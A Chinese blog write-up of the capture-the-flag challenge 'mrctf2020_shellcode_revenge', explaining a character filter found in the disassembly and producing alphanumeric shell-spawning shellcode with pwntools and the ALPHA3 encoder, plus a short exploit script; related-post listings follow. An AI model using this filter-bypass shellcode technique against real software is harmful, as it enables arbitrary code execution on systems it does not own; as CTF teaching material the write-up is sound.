mrctf2020_shellcode_revenge

最新推荐文章于 2024-07-08 10:04:53 发布
最新推荐文章于 2024-07-08 10:04:53 发布
阅读量778 收藏 1
点赞数
分类专栏: CTF PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/K1ose/article/details/116077226
版权
本文详细解析了一项CTF挑战,涉及可执行代码段分析、IDApro汇编解读,通过Alpha3工具构造shellcode,以实现程序绕过过滤。关键步骤包括利用特定字符输入和IDApro技巧。最终目标是通过exploit.py执行并获取flag。
摘要由CSDN通过智能技术生成

下载附件,checksec一下;
在这里插入图片描述

存在可读可写可执行的段;
看一下IDA pro的汇编;
在这里插入图片描述
和先前的题目类似,先read也给0x400bytes的字符串,然后compare一下eax和0;
jg表示jump if greater,如果eax>0则跳转,否则eax为0,跳到另一个地址;
接下来看到很多判断语句,截取其中一部分进行分析;
在这里插入图片描述
这里比较al和`的大小,jle表示jump if less or equal,即小于等于;
如果al<=60h,则跳转到11DA,如果al<=7Ah,则跳转到1236;
同理分析其他的判断语句,最后得到结果:
输入0x30-0x5f以及0x61-0x7f才能不被过滤;
需要利用这些字符去构造shellcode;
这里就要用到一个工具ALPHA3,git clone https://github.com/TaQini/alpha3.git

先写一个shellcode.py脚本,用于生成普通的shellcode;

from pwn import *
context.arch="amd64"
f = open('sc.bin','wb')
f.write(asm(shellcraft.sh()))
f.close()

执行后,用alpha3.py生成可见字符shellcode;

python ./ALPHA3.py x64 ascii mixedcase rax --input="sc.bin"

执行成功将会返回可见字符shellcode,再写个exploit.py,把shellcode打进去就好了;

from pwn import *

p = process("./mrctf2020_shellcode_revenge")
payload = "your_shellcode“
p.sendafter('magic!',payload)
p.interactive()

在这里插入图片描述
连buu,打过去,拿flag;
在这里插入图片描述

K1ose
关注
专栏目录
mrctf2020_shellcode
K1ose的博客
04-21 611
拿到附件后,先file一下; 看到是个64bit的程序,拖到ida64里; 再checksec一下附件,看看保护情况; 栈没有保护,有可读可写可执行的段; 可以dbg调试一下,看看具体情况; 可以看到有一个段可读可写可执行,栈也确实没有什么保护; 现在去IDA分析一下程序; 变量参数如下 可以看到前几行在设置标准输入输出和错误; 接着输出"Show me your magic!"; 然后read一个400bytes的数据; 接着是关键代码,将$eax赋值给[rbp+var_4],接着与0进行比较
pe_to_shellcode:将PE转换为Shellcode
05-09
pe_to_shellcode 转换PE,以便可以像普通shellcode一样将其注入。 (同时,输出文件仍然是有效的PE)。 同时支持32位和64位PE 作者: 和 客观的 该项目的目标是提供一种生成PE文件的可能性,该文件可以轻松完成...
mrctf2020_shellcode----wp
最新发布
2301_80168334的博客
07-08 689
也就是程序会从标准输入读取数据放入栈中,再跳转到栈中,并且从checksec可知栈是可执行的。可以知道开始是定义了buf是拥有0x410个字节的数据。接着向下分析可以知道是有三个setbuf函数,该函数是进行初始化数据的函数,接着是一个puts函数,接着有一个read函数,这个read函数的开始是0,接着是有0x400个字符可以进行读取。查看汇编代码的时候每一个函数是从下向上读取,所以可以知道read函数转化为read(0,&buf,0x400h),题目初始给的buf是0x410,所以不能实现栈溢出。
mrctf2020_shellcode_revenge(不用仔细分析汇编)
CsCN_的博客
07-10 391
日常拖进IDA一看,发现不能反编译,原因是0x124D位置有个call rax 然后看了一下汇编,发现又臭又长,由于本人还没有学汇编,有些地方看不懂 所以我干脆直接在IDA里面改汇编,把call rax改成call main就能反编译了 一目了然 稍加分析便能发现输入字符必须要在(47,122]里,也就是从0到z 图源:百度百科,侵删 后面的问题就变成怎样把用这些字符写出shellcode了 看了一些大佬们用alpha3重定向一下就能搞出shellcode,详见大.
[BUUCTF]PWN——mrctf2020_shellcode_revenge(可见字符shellcode
mcmuyanga的博客
03-15 3894
mrctf2020_shellcode_revenge 例行检查,64位程序,开启了RELRO和PIE 本地运行看一下大概的情况 64位ida载入,没法f5,直接看汇编 jg大于则跳转,jl小于则跳转,jump无条件跳转 要让程序继续执行下去,肯定是跳转loc_11AC loc_123A loc_11B8 cdqe使用eax的最高位拓展rax高32位的所有位 movzx则是按无符号数传送+扩展(16-32) EAX是32位的寄存器,而AX是EAX的低16位,AH是ax的高8位,而AL是ax的低
pe_to_shellcode_linux:PE到shellcode会将任何Windows非.dot net 64位EXE文件转换为shellcode。 这基于hasherezade的Windows pe_to_shellcode(https:github.comhasherezadepe_to_shellcode
02-13
pe_to_shellcode_linux PE到shellcode会将任何Windows非.dot net 64位EXE文件转换为shellcode。 这基于hasherezade的Windows pe_to_shellcode( )。 Hashrezade的HLDR64文件源 下载和构建: 在终端中,通过git...
Android系统shellcode编写.zip_android_shellcode
09-23
在Android系统中,shellcode是一种特殊的代码片段,用于在获得程序执行权限后,实现特定功能,比如控制系统、执行恶意操作等。随着Android设备的广泛使用,Android系统的安全性变得至关重要,而shellcode的编写和...
JMPESP.rar_jmp_jmp esp_jmp9.02 crack_shellcode_sp3 jmp esp
09-24
获取jmp esp地址程序,shellcode编写需要用到
[BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode)(内涵peak小知识)
Y_peak的博客
03-29 1258
[BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode) 检查了下保护发现NX 没有开,肯定要自己写shellcode呀。 不过这道题,刷新了我的认知。众所周知,手写的shellcode里面肯定有很多不可见字符。第一次碰到可见的shellcode。 看下IDA, 不能反汇编不过问题不大,没事. 个人建议,看汇编的时候,建议看流程图,更加直观 将shellcode写入,那个buf 不过下面肯定大于0呀.rbp + var_8是我们输入字符串的长度.发生转
BUUCTF--mrctf2020_shellcode1
qq_30528603的博客
01-27 690
正在我想如何覆盖返回地址的时候,发现题目直接帮你搞好了。取buf的的地址(栈上)然后跳转到buf位置执行代码。主函数中无法反汇编,那么我们直接看汇编代码。其实很简单,通过系统调用执行puts函数,然后执行read函数。这是一题64位的shellocde题,没啥花招入门题。
mrctf2020_shellcode 1
weixin_74861133的博客
03-10 318
关键代码从lea那开始到call _read是调用了read函数,从rbp+buf处输入0x400的数据,然后将返回值(read读取的字符数)存在eax中,后面会将eax中的值与0比较,如果大于0,就会跳到loc_11D6处执行,跳转到rbp+buf处执行,所以思路很简单,就是直接使用pwntools中的工具shellcraft.sh()生成shellcode,然后直接将其读入就可以夺权了。
mrctf2020_shellcode详解
勿山几已
06-09 637
简单演示mrctf2020_shellcode解题步骤
mrctf2020_shellcode_revenge|wustctf2020_name_your_cat|2018_gettingStart|SUCTF_2018_stack|wustctf2020
weixin_46521144的博客
04-05 410
这五道题都异常简单。。。也不知道为啥 wustctf2020_number_game 这题大概是csapp第二章学好了直接连就可以了。 v1=Tmin=-2147483648即可。因为32位有符号整数下Tmin是1000_0000_0000_0000,取反码加上1还是Tmin 2018_gettingStart 好吧,这道题还是CSAPP第二章知识直接运用。有一个简单的溢出覆盖,其实是考察浮点的位表示,写个c程序跑一下就出来了 #include<stdio.h> int .
[BUUCTF]PWN——mrctf2020_shellcode
mcmuyanga的博客
01-08 1395
mrctf2020_shellcode 附件 步骤: 例行检查,64位程序,开启了relro和pie,没有nx,肯定是用shellcode最方便了 本地试运行一下,看看大概的情况 64位ida载入,根据运行时看到的字符串,迅速定位到关键程序,但是没法f5成伪代码,直接看汇编 栈大小是0x410,读入了0x400,无法造成溢出覆盖返回地址 不过好像这边分析了用处也不大,直接利用pwntools生成shellcode发送即可 shellcode=asm(shellcraft.sh()) exp fr
others_shellcode
07-28
others_shellcode是一种外部的、已编写好的机器码程序,在计算机系统中用于执行恶意行为,例如攻击、病毒、木马等。它可以被黑客选用,注入到受害者主机的内存中,并被执行。由于others_shellcode本身就是已经准备好...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值